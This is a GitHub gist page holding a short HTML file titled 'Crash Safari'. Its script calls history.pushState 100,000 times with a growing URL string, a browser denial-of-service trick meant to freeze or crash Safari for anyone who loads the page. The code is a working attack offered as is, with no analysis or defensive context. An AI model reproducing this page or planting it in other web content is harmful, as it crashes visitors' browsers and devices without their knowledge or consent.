Created
          January 26, 2016 00:07 
        
      - 
      
- 
        Save jgamblin/df40e73f7c21f7dd3f36 to your computer and use it in GitHub Desktop. 
    crashsafari
  
        
  
    
      This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      Learn more about bidirectional Unicode characters
    
  
  
    
  | <!DOCTYPE html> | |
| <html> | |
| <body> | |
| <h1>Crash Safari</h1> | |
| <script> | |
| var total = ""; | |
| for( var i = 0; i < 100000; i++ ) { | |
| total = total + i.toString(); | |
| history.pushState(0,0, total ); | |
| } | |
| </script> | |
| </body> | |
| </html> | 
  
    Sign up for free
    to join this conversation on GitHub.
    Already have an account?
    Sign in to comment